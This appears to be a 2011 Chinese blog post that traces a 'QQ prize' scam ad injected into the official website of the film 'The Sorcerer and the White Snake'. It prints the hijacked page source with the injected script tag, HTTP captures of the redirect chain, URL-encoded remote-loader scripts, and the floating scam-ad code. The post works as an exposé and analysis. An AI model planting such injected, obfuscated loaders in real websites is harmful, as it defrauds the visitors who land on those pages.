首先,今天找电影,发现白蛇传说这部电影,然后又跑去官网看了看,居然发现被挂了诈骗广告!

白蛇传说官网地址:http://www.baishechuanshuo.com/

先介绍下电影:

2011年中国巨力影视投资1.8亿的魔幻爱情动作巨制。改编中国四大民间传说之一的《白蛇传》。由亚洲著名制片人崔宝珠监制,香港著名导演程小东执导。李连杰出演法海,黄圣依演绎白素贞,林峰饰演许仙,蔡卓妍饰演青蛇,更有文章、姜武、徐若瑄、杨千嬅、杜汶泽等众星共同出演。《白蛇传说》最终压倒《画壁》以2.2亿票房成为内地国庆档冠军。海外上映一周登上全球票房冠军宝座。电影《白蛇传说》作为唯一一部国语影片入围第68届威尼斯电影节。获得西切斯电影节最佳贡献奖。提名第48届金马奖,最佳视觉效果。

这个挂的广告,很垃圾,持续了N年的“QQ中奖诈骗广告”,很垃圾的诈骗手段,相信这年头没什么人上当了。

接下来来看分析过程……

惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”!

惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”!

首页广告的截图

惊爆!电影白蛇传说官网被挂“QQ中奖诈骗广告”!

首页源代码截图

首页的代码很简单,调用了几个flash文件,发现了一段可以的JavaScript代码,如下所示:

首页源码

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="zh_cn" lang="zh_cn">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta name="keywords" content="电影《白蛇传说》">
    <meta name="description" content="电影《白蛇传说》由巨力影视投资过亿打造的魔幻动作爱情大片,由杨子出品,亚洲著名制片人崔宝珠监制,老版《倩女幽魂》导演程小东执导。功夫皇帝李连杰出演法海,“四小花旦”之一的黄圣依演绎白素贞,“万人迷”林峰饰演许仙,阿SA蔡卓妍饰演青蛇,文章、姜武、徐若瑄、杨千嬅、杜汶泽、罗家英、林雪、郭羡妮等中港明星共同出演。">
<title>电影《白蛇传说》官方网站</title>
<style type="text/css">
<!--
html,body {
    margin:0px;
}
td{
 font-size:12px;
 color:#555;
 line-height:24px;
 font-family:Arial, Helvetica, sans-serif;
}
a:link {
     color: #555;
     text-decoration: underline;
}
a:visited {
  color: #555;
     text-decoration: underline;
}
a:hover {
     color: #888;
     text-decoration: underline;
}
a:active {
     color: #555;
     text-decoration: underline;
}
.tbg{
 background-image: url("photo/video_bg.jpg");
 background-position:center;
 background-repeat:no-repeat;
 text-align: center;
 }

-->
</style></head>
<body bgcolor="#000000">
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" name="flashweb" width="100%" height="100%" align="middle" id="puyong">
<param name="allowScriptAccess" value="sameDomain" />
<param name="menu" value="false" />
<param name="allowFullScreen" value="true" />
<param name="movie" value="index.swf" /><param name="quality" value="best" /><param name="bgcolor" value="#000" /><embed src="index.swf" quality="best" bgcolor="#000" width="100%" height="100%" name="flashweb" align="middle" allowScriptAccess="sameDomain" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />
</object>
<SCRIPT src="http://uuz.cc/fu7" type=text/javascript></SCRIPT>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
            <td align="center" height="0"><Img src="copyright.jpg" border="0" usemap="#Map"></td>
          </tr>
<tr><td  align="center" style="color:#333333">关于我们:北京彩虹山文化传播有限公司致力于中国影视文化的传播及推广,全权负责由中国巨力影视传媒有限公司投资制作的电影《白蛇传说》宣传及推广事宜。</td></tr>
          <tr>
<tr><td  align="center" style="color:#333333">联系方式:52037866   地址:北京市朝阳区建国路89号华贸商务楼4号楼1801室</td></tr>
<tr><td height="20"></td></tr>
          <tr>
            <td align="center" height="0"><script src="http://s21.cnzz.com/stat.php?id=3338351&web_id=3338351&online=1&show=line" language="JavaScript"></script></td>
          </tr>
</table>

<map name="Map">
  <area shape="rect" coords="776,221,921,245" href="http://www.qjspace.com/" target="_blank">
</map>
</body>
</html>

以上代码中,红色的即为被挂的广告代码,打开这个地址,继续跟进:

抓包数据:

GET /fu7 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: uuz.cc
Connection: Keep-Alive

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://www.googleadsl.com/spcode/cp.js
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.8
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2011 20:10:57 GMT
Content-Length: 161

<head><title>鏂囨。宸茬Щ鍔?/title></head>
<body><h1>瀵硅薄宸茬Щ鍔?/h1>鍙湪<a HREF="http://www.googleadsl.com/spcode/cp.js">姝ゅ</a>鎵惧埌璇ユ枃妗?/body>

很明显,页面被301重定向了,继续跟进……

抓包数据:

GET /spcode/cp.js HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/msword, */*
Accept-Language: zh-cn
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: www.googleadsl.com
Connection: Keep-Alive

HTTP/1.1 302 Redirect
Content-Length: 188
Content-Type: text/html
Location: http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/type.js
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Fri, 02 Dec 2011 20:10:04 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/type.js">here</a></body>

又是302重定向,这是最后一次跳转了,下载这个js分析看看……

http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/type.js:

var where = document.referrer
var host = window.location.host;
if ( where.indexOf(host) !=7 )
{ document.write ('<script src="http://%6D%63%6E%61%6B%71%71%63%2E%63%6F%6D/%53%6B%69%6E/%44%65%66%61%75%6C%74/%4D%65%6D%62%65%72/ad.asp"></script>') }

很简单,一个远程调用js的JavaScript代码,调用的地址被URL编码了,解码后为:http://mcnakqqc.com/Skin/Default/Member/ad.asp。

注意,这个地址记录了访问者IP,在一定的时间内只输出一次广告代码,大家可以简单的理解为“24小时内只对同一个IP弹一次广告”,一般这种手法,是刻意隐藏自己,不想让人发现,也就是不正常的挂广告方式,你懂的……

我们继续跟进……

http://mcnakqqc.com/Skin/Default/Member/ad.asp:

document.write("<script src=http://%77%77%77%2E%71%7A%74%33%36%30%2E%63%6E/%53%63%72%69%70%74%73/%72%75%69%74%6D%65%6E%74/%61%72%74%69%63%6C%65%66%75%6E/%6E%65%77%5F%6C%69%73%74/proto.js></script>");

又是一段,远程调用js的JavaScript代码,URL同样被编码了,解码后地址为:http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/proto.js,继续跟进……

http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/proto.js:

var cookieString=document.cookie;
var start=cookieString.indexOf("cookiesleep");
if(start!=-1){}else{var expires=new Date();
expires.setTime(expires.getTime()+6*60*60*1000);
document.cookie="cookiesleep=test;expires="+expires.toGMTString();
var qq_etewidth = 254;
var qq_eteheight = 156;
var qq_banner_filename = "http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/click.gif";
var qq_gotoUrl = "http://www.qzt360.cn/newsite/visibility/E%25F%25F%25C%25B%25E%25C/D%25C%25C%25A%25C%25%25D%25D%25U%25D/F%25D%25T%25B%25S%25C%25F/zout.asp";
document.write("<div id=eteUnionUpFloat style='margin:0px;padding-bottom:300px;z-index: 10;position:absolute;width:"+qq_etewidth+"px;height:"+qq_eteheight+"px;'>")
document.write("<a href='"+qq_gotoUrl+"' target='_blank'><img src='"+qq_banner_filename+"' border='0' style='cursor: hand;' width='"+qq_etewidth+"' height='"+qq_eteheight+"'></a>")
document.write("</div>")
var bodyfrm = ( document.compatMode.toLowerCase()=="css1compat" ) ? document.documentElement : document.body;
var adst = document.getElementById("eteUnionUpFloat").style;
adst.top = ( bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.clientWidth - qq_etewidth ) + "px";
function moveR() {
adst.top = ( bodyfrm.scrollTop + bodyfrm.clientHeight - qq_eteheight ) + "px";
adst.left = ( bodyfrm.scrollLeft + bodyfrm.clientWidth - qq_etewidth ) + "px";
}
var objTimer=setInterval("moveR();", 100);
function CloseX(){
adst.display='none';
}
function ete_closediv()
{
document.getElementById('eteUnionUpFloat').style.visibility='hidden';
if(objTimer) window.clearInterval(objTimer)
}document.writeln("<BGSOUND balance=0 src=\"http://www.qzt360.cn/Scripts/ruitment/articlefun/new_list/sote.wav\" volume=-240>");
}

好了,找到罪魁祸首了,原始的广告代码,就不解释了,很简单的JavaScript。

最后分析:

1、连续跳转了这么多次,而且还可以的隐藏自己,一定时间内对一个用户只弹一次广告,这肯定不是正常的挂广告行为,当然,绝对是非法的!

2、那么又是谁挂的这个广告?有两种可能,一是网站的管理人员(网站的所有公司并不知情),为了捞外快,接了挂广告的代码,挂上去了。第二种可能,被入侵者挂广告?

3、通过百度快照,该站百度快照为10月5日,百度快照的源码中,该广告位置的html代码空了一行,这是因为百度抓取的时候默认过滤掉了JavaScript标签,导致产生一个空行,这表示百度抓取的时候,该页面是存在该JavaScript广告代码的,也就是说,早在10月5日,该站就已经被挂广告了。

4、那么,被入侵者挂广告的可能性极低,要保持权限将近两个月,不是一件容易的事情,但是不排除被入侵者挂广告的可能,因为这种网站基本不维护,没人管,保持权限久一点,应该问题不大。那么,还有谁?你懂的,恶心的网站管理员……

分析结束,希望网站的所有公司尽快处理一下,这个影响很不好,很恶心!超恶心!!这网站管理员,想钱想疯了……